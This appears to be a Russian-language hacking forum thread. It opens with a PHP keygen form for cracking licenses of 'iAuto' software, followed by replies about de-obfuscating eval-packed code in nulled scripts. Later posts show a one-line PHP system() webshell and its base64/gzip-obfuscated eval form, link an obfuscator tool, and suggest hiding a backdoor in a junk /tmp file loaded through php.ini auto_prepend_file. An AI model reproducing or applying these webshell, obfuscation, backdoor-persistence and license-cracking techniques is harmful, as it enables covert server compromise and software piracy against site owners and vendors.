<form action="keygen.php" method="post">
<input type="hidden" name="date" value="2018-01-01" />
<div class="step">Step 1.</div>
<div class="text">Please complete the form below to generate your iAuto Site &amp; Admin licenses</div>
<div style="clear:both;"><!-- --></div>


<label for="fname">Your Firstname &amp; Lastname</label>

<input type="text" class="input" name="fname" value="Bill" style="width:150px;" /> <input class="input" type="text" name="lname" style="width:250px;" value="Gay-tes" /> Just enter some non-real name


<label for="emailaddress">Your Email Address</label>

<input type="text" class="input" name="emailaddress" style="width:420px;" value="" />


<label for="websiteaddress">Your iAuto website Url</label>

<input type="text" class="input" name="websiteaddress" style="width:420px;" value="<?php echo $normalUrl; ?>" /> Default should be Ok. No trailing / at the end!


<label for="adminaddress">Your iAuto admin Url</label>

<input type="text" class="input" name="adminaddress" style="width:420px;" value="<?php echo $adminUrl; ?>" /> Default should be Ok. No trailing / at the end!


<div style="float:right; margin-right:0px; margin-top: 4px;">
<input name="submit" type="submit" class="button" value="Generate License" />
</div>
<div style="clear:both;"><!-- --></div>
</form>
</div>
</body>
</html><?

Это расшифрованный код, достаточно было заменить

eval(

на

$file=fopen("w.txt",'a+');
fwrite($file,

Пояснения по каждой функции можешь найти на офсайте http://www.php.net/ или на русском не официальном http://www.php.su/ .

 

[mixa]

fopen

эта та я сам допетрил что там раскодировал но я как ламер немогу вехать что этот кад делает в нулонке он идёт как крек к скрипты лицензии ставиш и удаляеш вот толька где там зарита собака я невежаю
модет кто поеснит ламеру что там скритота спецам выднее чем мне рится в каждом слове

 

[mixa]

в лицензии прописывается мыло мое а вот сам код расшифровать не могу интересно что это значит????
first_name = "Bill";
last_name = "Gay-tes";
email = "giameil@mail.ru";
site_url = "http://localhost/iauto";
expiration_date = "2018-01-01";
verification_code = "9195cdfb23496cd33730d42ed38ba6c9OGZkMjVlMGQxMzU1OTI5MTcwYzMwNTI0YWIwZTMwMGFaVEk1WlRSa1pUUmlaRFF6T0ROak56ZGhaak0zWXpJM1lUWXdOak16WldOYWFsRTBUbTFPYkU1RVl6Vlpla2t3VFVkVmVGbFVTbWxhYWxGM1RVZFZNMDVIU20xTlZGVTFUbXBPV2xaR1ZqVlVNRkpTVFRGcmVWZHRNVTVOYkdzd1ZGWmtSMkZzYTNsVldIQlFWakZhY1ZSV1VtNWxhemxGVlZSQ1RsSXdXbkZVVkVwVFZESktWbU5JU2xWV2JFcDVXbGR6TVZKV1NuUmhSbkJPWWtWWmVsWXhZM2hTTWtwR1QxWldWV0pZVW1GWmJGWnlUVVprY2xwR2NFOVdiWGg0Vld4U1YxUXlSbk5UYmtKVlZsZFNWRlpITVVkamJFcHhWV3hXVGxKVVJYcFhhMUpDWlVaYVJrMVZiR0ZTVkZaWVZGVmFkazFzV1hsa1IzUmFWakJ3ZVZSV1dsZFdiR1JJWlVVNVlWWXphRmhhVlZwUFpFZFNObEZ0YkZOWFJVcEpWbFJLTkZZeFZYZE5WV1JxVW0xb1YxWnFUbE5OTVZwSFZsUldhbEl3VmpWVU1WWTBZVVphUmxKVVJsWk5NMEpJVkZWYWQxTkdUbkpYYlhoVFZrVmFWMVpYZEd0Vk1sSlhXa2hTVGxack5WTldha0poVTJ4YVdHTkZUbWhpUlhCSlZERlNTMVpXU2taaWVrSmhVak5vZVZwV1drdGtWbEowWVVaT2JHSllZM2xXTW5SWFZHczFXRlJyWkdsU2JYaFlXVmQwUzJOR2NFbGlNMlJRVmxob1ZsVnNhSGRVYlZaellYcENWVmRJUW5WVVZFRjRWbFprZEdKSFJsTlNWbFY0Vmtab2QxVnRWa2RpUm1oVllsaFNUMVZxUW5kaU1XUnpWVzVLYkdKSVFrbFZNakZ6VlVaSmVGTnVVbFZOVjFKTFdsVlZOVlpXWkZWUmJIQm9ZVEJ3ZVZSR1VrcGtNRGxGVmxSU1VGWkZNREZVV0hCTFlVVTFWVk5VVWs5U1IxSnhWMjB4V21Wc2NIRmFNMmhhVmpBMWNWZHJVazVPVm5CWVZGaG9VRkpGTURCVWExSlNaREZzV0ZSWWNHRlJWREE1VFZSUk1VMTZVVFZOVkVVd1RVZFpNRTlFV21wYVZGRXpUMWROZVU1RVFteE5WMFY1V1cxWk1FMUVRbXhPZWxKcFdtcEZNVTlVV1hveE5URTBPVEk0TURrMFpUSTVaVFJrWlRSaVpEUXpPRE5qTnpkaFpqTTNZekkzWVRZd05qTXpaV009MzAwMDkwMTQ1OGZkMjVlMGQxMzU1OTI5MTcwYzMwNTI0YWIwZTMwMGE=-490686379195cdfb23496cd33730d42ed38ba6c9";

 

[Ar3s]

Ребята! Давайте вспомним про правила хорошего тона. Или атачами такое прикрепляйте или на пастебине размещайте!

 

[Dragon_X]

весь код выложи - тогда будет понятно что представляет лицензия
иначе не понять

 

[Zer0]

Алгоритм шифрования проше но нового ничего не увидел

Скрипта на php работает из консоли, кодирует имена переменных + кодирует все в base64 и жмет gzip'ом.
Использовать так

php zcoder.php /home/user/soft/shell.php /tmp/code_shell.php

пример рабботы
Исходный фал

<? $qw=[cmd]; system($qw); ?>

Результат

<? eval(gzinflate(base64_decode("U1CpSjExTLFITrG0SDMwSDIyMEm1tDAwsLS0SE1OszAxMk+1jU7OTYm1ViiuLC5JzdUgrEHTWoELAA=="))); ?>z

Увы не на всех серверах можно использовать eval

Спойлер: 20

http://www.sendspace.com/file/1vsjhj

 

[scanislav]

Как вариант, вписать бекдор в какой-нибудь бесполезный файл /tmp/blachblah.jpg.tmp
и добавить в php.ini директиву

auto_prepend_file string /tmp/blachblah